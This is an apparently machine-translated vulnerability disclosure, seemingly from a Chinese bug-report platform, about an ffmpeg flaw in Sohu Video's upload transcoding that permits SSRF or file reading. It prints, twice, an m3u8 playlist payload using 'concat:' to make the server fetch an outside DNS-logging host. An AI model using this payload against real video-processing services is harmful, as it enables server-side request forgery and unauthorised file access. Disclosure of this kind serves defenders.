漏洞标题 搜狐视频ffmpeg漏洞可以是文件读取/SSRF 相关制造商 搜狐 漏洞作者 腰部荒凉 提交时间 2016-05-06 16: 14 公共时间 2016-06-20 16: 30 漏洞类型 命令执行 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 远程命令执行 漏洞详细信息 1.上传视频并开始转码
2.payload #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0, Concat:http://aaa00e.dnslog.info #EXT-X-ENDLIST 3.cloudeye返回请求
漏洞证明: 1.上传视频并开始转码
2.payload #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0, Concat:http://aaa00e.dnslog.info #EXT-X-ENDLIST 3.cloudeye返回请求
修理计划: 升级 版权声明:请注明出处。退役腰@乌云